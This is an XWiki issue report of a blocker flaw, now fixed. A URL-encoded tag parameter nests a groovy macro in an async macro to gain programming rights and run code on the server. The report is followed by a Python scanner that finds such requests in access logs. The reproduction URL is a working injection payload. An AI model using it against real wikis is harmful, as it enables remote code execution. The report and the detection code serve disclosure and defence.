Details
- Type: Bug
- Resolution: Fixed
- Priority: Blocker
- 2.0
Description
Steps to reproduce:
Open <server>/xwiki/bin/view/Main/Tags?do=viewTag&tag=%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
Expected result:
Tags for {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("hello from groovy!"){{/groovy}}{{/async}} are displayed.
Actual result:
Tags for hello from groovy! are displayed.
This demonstrates a privilege escalation attack from view rights on Main.Tags to programming rights. It is also a remote code execution attack.
This most likely affects all versions of XWiki that contain the async macro (version 11.6RC1 and later), which allows the script macro nesting protection to be circumvented. Similar attacks might also be possible with the job macro; this is still to be verified.
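For an administrator who wants to know whether this was tried against their instance, the following is an added example, not code from the report or from XWiki: it scans web-server access logs for viewTag requests whose tag parameter carries wiki macro syntax, flags script-capable macros separately, and decodes repeatedly so a double percent-encoded value is not missed. The log lines are constructed (the second reuses the URL from the report), and the macro names beyond async and job are an assumption about which XWiki macros can run scripts.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Macros that should never appear in a tag name: async and job are named in the
# report, the others are XWiki's script macros (assumed list).
SCRIPT_MACROS = {"async", "job", "groovy", "velocity", "python", "script"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
MACRO_RE = re.compile(r"\{\{/?\s*([A-Za-z][A-Za-z0-9_-]*)")

# Constructed access-log lines; line 2 reuses the URL from the report, line 3 is
# the same idea with a harmless macro, double percent-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /xwiki/bin/view/Main/Tags?do=viewTag&tag=security HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /xwiki/bin/view/Main/Tags?do=viewTag&tag=%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 300
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /xwiki/bin/view/Main/Tags?do=viewTag&tag=%257B%257Binfo%257D%257Dx%257B%257B%252Finfo%257D%257D HTTP/1.1" 200 300
10.0.0.3 - - [01/Jan/2024:10:00:03 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 1024
"""

def fully_decode(value):
    """Percent-decode until stable so a double-encoded payload is not missed."""
    while (decoded := unquote(value)) != value:
        value = decoded
    return value

def tag_param(target):
    """Decoded tag parameter of a Tags?do=viewTag request target, else None."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    if not parts.path.endswith("/Tags") or query.get("do") != ["viewTag"]:
        return None
    return fully_decode(query["tag"][0]) if "tag" in query else None

def classify(tag):
    """'ok' when the tag holds no macro syntax, else the macros it invokes."""
    macros = sorted({m.group(1).lower() for m in MACRO_RE.finditer(tag)})
    if not macros:
        return "ok", []
    return ("script-injection" if set(macros) & SCRIPT_MACROS else "macro-injection"), macros

def scan_log(text):
    """(line_no, verdict, macros) for every viewTag request carrying macro syntax."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        tag = tag_param(m.group(1)) if m else None
        if tag is None:
            continue
        verdict, macros = classify(tag)
        if verdict != "ok":
            hits.append((n, verdict, macros))
    return hits
```

A legitimate tag name never contains `{{`, so any hit is worth investigating; a script-injection hit on a version before the fix should be treated as a likely compromise of the server, not just of the wiki content.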
Issue Links
- is caused by: XATAG-23 Convert Documents to XWiki Syntax 2.0 and fill their title field (Closed)